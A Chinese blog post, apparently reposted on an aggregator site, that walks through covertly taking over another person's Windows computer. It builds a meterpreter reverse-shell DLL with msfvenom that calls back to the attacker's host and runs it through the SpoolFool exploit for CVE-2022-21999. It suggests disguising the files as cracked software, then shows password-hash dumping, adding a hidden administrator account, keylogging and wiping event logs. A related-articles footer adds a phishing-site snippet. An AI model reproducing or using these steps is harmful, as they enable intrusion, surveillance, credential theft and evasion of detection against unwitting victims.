如何通过.exe文件控制一台电脑

news2024/11/23 12:18:08

 CVE-2022-21999漏洞

  如何实现发送一个.exe文件偷偷控制他人的电脑?这个想法很刑的,所以我只是说明我的实现方式,具体操作建议仅用于hvv等专业领域,请勿以身试法。

  首先我们分析一下.exe文件的实际应用场景---windows系统的电脑,所以我们需要入侵的就是一台私人的windows电脑,通过.exe文件入侵的好处是我们可以把我们的.exe文件伪装成市场上任何一款破解软件,并要求用户使用安装前关闭杀毒软件,降低技术实现难度。我这边不提供这些操作,所以还是说一下实现方式。该实现方式主要基于最新的CVE-2022-21999漏洞,利用Windows Print Spooler 特权提升漏洞 (LPE),在远程控制windows电脑后可以完成权限的提升,拿到管理员权限从而完整的控制计算机。当然这个漏洞已经于2022 年 2 月,微软修补了 CVE-2022-21999 漏洞。不要灰心,任何系统、软件程序都存在漏洞的,也许现在它的代码、逻辑都毫无破绽,但人恰恰就是最大的破绽,时间总会证明一切。学习恰恰是最美好的。

下载系统、入侵文件

  我使用的是kali Linux,这款系统比较实用,自带的软件非常适合学习网络攻防,需要的可自行下载,以下是该系统官网,Kali的iso镜像安装方式很复杂,如果想省事儿,建议直接下载VMWare镜像,学习是足够了Get Kali | Kali Linuxicon-default.png?t=M85Bhttps://www.kali.org/get-kali/#kali-platforms

 安装好kali系统,我们就可以使用了,首先我们需要下载一个SpoolFool.exe文件,您也可以👉点这里快访问, 这是大佬根据CVE-2022-21999漏洞实现 Windows 后台打印程序特权提升漏洞 (LPE)开源的github。

下载好SpoolFool.exe文件,就可以在该文件夹右键打开kali cmd控制台

 为了不影响一些输入命令的权限问题,我们先提权,输入

sudo su

回击并输密码,完成用户提权

我们需要知道我们kali linux的IP地址,方便我们在需要远程入侵时能准确无误生成配置文件并有效监听到目标电脑,所以输入

hostname -I

 然后,我们需要使用msfvenom来创建一个恶意payload的文件来完成反弹shell,其中LHOST为你的kali linux的IP地址、LPORT为你kali linux将要监听的端口,>生成文件名可以任意,但要以.dll结尾,所以输入

msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=192.168.61.137 LPORT=4444 >hackerloi.dll

 

前期准备工作是完成了, 现在我们有一个SpoolFool.exe文件和一个hackerloi.dll文件,如何把这些文件传输给目标电脑,并让目标心甘情愿打开运行?

这种事情,不能细嗦,太刑啦。现在我们需要先在自个电脑开启监听,在kali linux里启动metasploit渗透框架的监听器

sudo msfconsole

 然后输入

use exploit/multi/handler

 设置我们要使用的payload

set payload windows/x64/meterpreter/reverse_tcp

输入下面命令查看我们可以输入的参数

show options

 这里可以看到LHOST还没有填写,因此我们需要设置一下

 设置LHOST为我们kali linux的IP地址

set LHOST 192.168.61.137

都设置好了,我们就可以运行了

run

现在我们只需要等待用户打开文件,就可以监听上了

 目前我们开启了监听,就像钓鱼,鱼竿鱼钩都准备好了。之前准备的SpoolFool.exe、hackerloi.dll文件就像鱼饵,但这鱼饵平平无奇啊,所以我们需要伪装。但伪装需要的知识非常多,毕竟这些鱼饵在杀毒软件和windows系统眼中就是病毒一般的存在。

如何欺骗用户关闭杀毒软件?

跳过windows系统的病毒检测?

自行了解就行,我们了解一下底层逻辑,我们需要在客户机运行SpoolFool.exe、hackerloi.dll文件,不考虑系统防护和杀毒软件层次的问题,那么我们只需要确认客户机器有这两个文件,并都不小心运行了,但用户一般不会点击运行dll文件,所以简单写一个.bat文件伪装一下,当.bat文件不小心被用户点击运行就能实现。其实具体操作就是需要运行SpoolFool.exe、hackerloi.dll文件。这里就需要大家自我发挥了,很刑的自己研究咯,我们这里只讲解最原始的

SpoolFool.exe -dll hackerloi.dll

我们回到kali linux,发现已经可以输入命令了 

譬如输入sysinfo,我们就可以看到windows系统的信息了

 当然操作还有很多, 比如

ps:查看进程。

screenshot:进行屏幕截图并存储在我们的系统之中。

shell:进入管理员权限cmd

其实这些操作都是一般,真正的骚操作开始了

权限提升

有的时候,你可能会发现自己的Meterpreter会话受到了用户权限的限制,而这将会严重影响你在目标系统中的活动。比如说,修改注册表、安装后门或导出密码等活动都需要提升用户权限,而Meterpreter给我们提供了一个“getsystem”命令,它可以使用多种技术在目标系统中实现提权

 “getuid”命令可以获取当前用户的信息,在上面的例子中,用户为“NT AUTHORITY\SYSTEM”,这个就是Windows本地系统账号。

获取凭证

hashdump模块(post)可以从SAM数据库中导出本地用户账号,credential_collector脚本(post/windows/gather/credentials)也可以从目标设备中收集令牌信息。

脚本和post模块都需要通过“run”命令执行,我在测试环境中运行hashdump模块后的结果如下:

 

数据的输出格式为:用户名:SID:LM哈希:NTLM哈希:,所以我们得到了三个用户账号,分别为Administrator, Guest和Coen。

其中的LM哈希(aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:)跟NTLM哈希(aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0)对应的是一个空密码。

接下来要处理的就是用户mrhackerloi的密码(aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52)了。虽然我们可以使用类似John the Ripper这样的工具来破解密码,但是我们直接Google这个哈希之后,就直接得到了密码明文:12345678。

创建新的本地用户

我们只需要在kali linux中输入对应的命令shell,进入管理员权限cmd,再创建一个用户名为hacker密码为12345678的用户

net user hacker 12345678 /add

 然后,再给他提升用户组权限到administrator就成管理员了

net localgroup administrator hacker /add

 

 

键盘记录

Meterpreter还可以在目标设备上实现键盘记录功能,键盘记录主要涉及以下三种命令:

keyscan_start:开启键盘记录功能

keyscan_dump:显示捕捉到的键盘记录信息

keyscan_stop:停止键盘记录功能

清除事件日志

完成攻击操作之后,千万别忘了“打扫战场”。我们的所有操作都会被记录在目标系统的日志文件之中,因此我们需要在完成攻击之后使用命令“clearev”命令来清除事件日志:

 好了,学习知识是如此的快乐,希望你有所收获!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/87253.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

11、setoolkit工具 构造钓鱼网站、powershell注入

靶机:192.168.11.105攻击机kail:192.168.11.1061.在kali中启动setoolkitsetoolkit2.利用SET构建钓鱼网站1)选择1 Social-Engineering Attacks (社会工程学攻击)2)选择2 Website Attack Vectors &#xff…

Spring Boot 概念、创建和运行 · Spring Boot 的优点 · 启动第一个 Spring Boot · Spring Boot 的注意事项

一、什么是 Spring Boot二、Spring Boot 优点三、Spring Boot 项目创建四、项目目录介绍和运行4.1 运行项目4.2 输出 Hello World五、注意事项5.1 包路径错误5.2 小结:约定大于配置六、总结一、什么是 Spring Boot Spring 的诞生是为了简化 Java 程序的开发的&…

GAMES101-现代计算机图形学入门-闫令琪 课程笔记 - 汇总(上)

一些前言与感慨: 学了再多的AI,终究还是没有办法拒绝计算机图形学的魅力。当初就不该一招不慎,踏入AI的坑。 可惜当年在学校里学计算机图形学的时候,还没有闫令琪这么好的课程,当时学得一知半解,云里雾里…

极市直播回放第106期丨阿里达摩院:兼顾速度与精度的高效目标检测框架DAMO-YOLO

阿里巴巴达摩院智能计算实验室团队设计并开源了一款兼顾速度与精度的目标检测框架DAMO-YOLO,其性能超越了目前的一众YOLO系列方法,在实现精度SOTA的同时,保持了很高的推理速度。DAMO-YOLO是在YOLO框架基础上引入了MAE-NAS、efficient-RepGFPN…

cas:1628790-40-8|脂溶性Cyanine7-COOH|CY7-Carboxylic Acid

cas:1628790-40-8|脂溶性Cyanine7-COOH|CY7-Carboxylic Acid 名称:脂溶性Cyanine7-COOH|CY7-Carboxylic Acid cas:1628790-40-8 英文同义词: Cy7;Colpro;Prothil;R-13615;Cy7-COOH;CY7ACID;Cy7NHS;AY-62022;Cy7,>97%;Sulfo-Cyanine7 中文名称:磺基-CY7羧酸 …

【小甲鱼C语言】课后笔记第一章第四节——数据类型

目录 1、数据类型 2、short 和 long 3. sizeof 运算符 4. signed 和 unsigned 5、课后习题(编程题) 1、数据类型 在 C 语言里,所谓的数据类型就是坑的大小。我们说变量就是在内存里边挖一个坑,然后给这个坑命名。那么数据类型…

U盘格式化后能恢复数据吗?U盘删除的数据还能恢复吗

U盘格式化后能恢复数据吗?通常情况下,我们U盘里的数据丢失后,它们并没有立即消失,它们只是被系统做了一个标记,将数据存储的位置标记成可写入的状态,只有当新数据写入的时候,这个存储位置才会被…

USB转UART的桥接控制器 国产DPU02能不能软硬件兼容替换CP2102?

DPU02是一个高度集成的USB转UART的桥接控制器,可将RS-232设计更新为USB设计,并简化PCB组件空间。 该DPU02包括了一个USB 2.0全速功能控制器、USB收发器、振荡器、EEPROM和带有完整调制解调控制信号的异步串行数据总线(UART)控制器…

自动驾驶车辆安全保证机制-Mobileye的RSS模型

自动驾驶汽车(AV)将如何与人类司机安全地共享道路? 成功实现自动驾驶未来的最大威胁之一是对自动驾驶汽车安全驾驶的含义缺乏共识。只有当行业、政府和公众有一个共同的方式来理解和评估自动驾驶汽车(AV)的驾驶技能和安全,他们才会被信任,可以安全地与人类驾驶的车辆一起…

Go1.19.3 数组与切片原理简析

数组 Go语言数组,声明有如下几种方式: var arr1 [10]intarr1[0] 10000var arr2 [10]int{0:0,2:2}var arr3 [...]int{1,2,3}其中arr1只是进行声明,数组在声明时,内存空间已经被开辟过,所以可以赋值。arr2是声明的同…

javafx 编写管理页面 增删改查

注册界面&#xff1a;用户通过输入页面信息&#xff0c;点击注册&#xff0c;将数据存入数据库中。 <Tab text"用户注册"> <content> <AnchorPane minHeight"0.0" minWidth"0.0" prefHeight"761.0" prefWidth"819…

Vue的四个常用选项

文章目录前言一、四大选项简介二、filters&#xff08;过滤器&#xff09;三、computed&#xff08;计算属性&#xff09;四、methods&#xff08;方法&#xff09;五、watch&#xff08;观察&#xff09;总结:前言 本文讲解了vue.js中的四个常用选项&#xff0c;4个参数选项&…

数据结构——归并排序

坚持看完&#xff0c;结尾有思维导图总结 这里写目录标题归并排序的思路归并算法的图解具体程序对性质的分析归并排序的非递归版本总结归并排序的思路 首先第一个问题是&#xff0c;什么是归并排序&#xff1f; 官方的说法: 归并排序&#xff08;MERGE-SORT&#xff09;是建立…

pikachu靶场-7 不安全的文件下载和上传

不安全的文件下载和上传 不安全的文件下载 文件下载&#xff08;unsafedownload&#xff09;漏洞概述 很多网站都会提供文件下载功能&#xff0c;即用户可以通过点击下载链接&#xff0c;下载到链接所对应的文件。 但是&#xff0c;如果文件下载功能设计不当&#xff0c;则…

基于51单片机的数字频率计设计

仿真原理图&#xff1a; 程序运行图&#xff1a; 部分程序&#xff1a; #define LED_GLOBAL 1 #include "led.h" /******************************************************************************************* *函数名称&#xff1a;delay_us(uint us) *函数…

15.JavaScript 02

文章目录一、DOM简单学习&#xff1a;为了满足案例要求1、DOM知识点简单学习2、事件简单学习3、案例1&#xff1a;电灯开关二、BOM1、概念2、组成3、Window&#xff1a;窗口对象1. Window窗口对象知识点2. 案例2&#xff1a;轮播图4、Location&#xff1a;地址栏对象1. Locatio…

手写Spring5(资源加载Spring.xml解析和注册Bean对象)

文章目录目标设计思路项目结构一、实现1、资源加载接口定义和实现获取ClassPath下的文件信息获取指定文件路径的方式读取文件信息获取HTTP的方式读取云服务的文件2、包装资源加载器定义和实现-策略模式的体现包装资源加载器实现3、Bean定义读取接口4、Bean定义抽象类实现5、解析…

[激光原理与应用-53]:《激光焊接质量实时监测系统研究》-4-激光焊接系统软件设计

目录 前言&#xff1a; 4.1 操作系统和开发平台 4.1.1 Windows2000 操作系统概述 4.1.2 虚拟仪器开发平台软件 LabWindows/CVI 4.2 总体软件设计 4.2.1 数据采集程序 4.2.2 软件实现的功能 4.2.2.1 主机软件的数据采集 4.2.2.2 主机软件的数据分析&#xff08;核心&am…

暗棕红色粉末ICG-COOH, ICG Carboxlaic acid,181934-09-8,ICG和PEG链接可在体内长循环

英文名&#xff1a;ICG-COOH ICG Carboxlaic acid CAS No:181934-09-8 外观&#xff1a;暗棕红色粉末 溶解度&#xff1a;在水或甲醇中溶解 纯度&#xff1a;90% 结构式&#xff1a; 西安凯新近红外荧光染料Near IRDyes激发和发射波长和颜色图 ICG NHS ester的NHS可以和蛋白…

八、闭包高级、对象、构造函数、实例化

闭包高级、对象、构造函数、实例化 闭包高级 函数被定义时生成[[scope]]->生成scope chain -> scope chain中存着上级的环境。 函数被执行的前一刻&#xff08;预编译过程&#xff09;&#xff0c;生成自己的AO&#xff0c;排到scope chain的最顶端。 函数执行完毕的…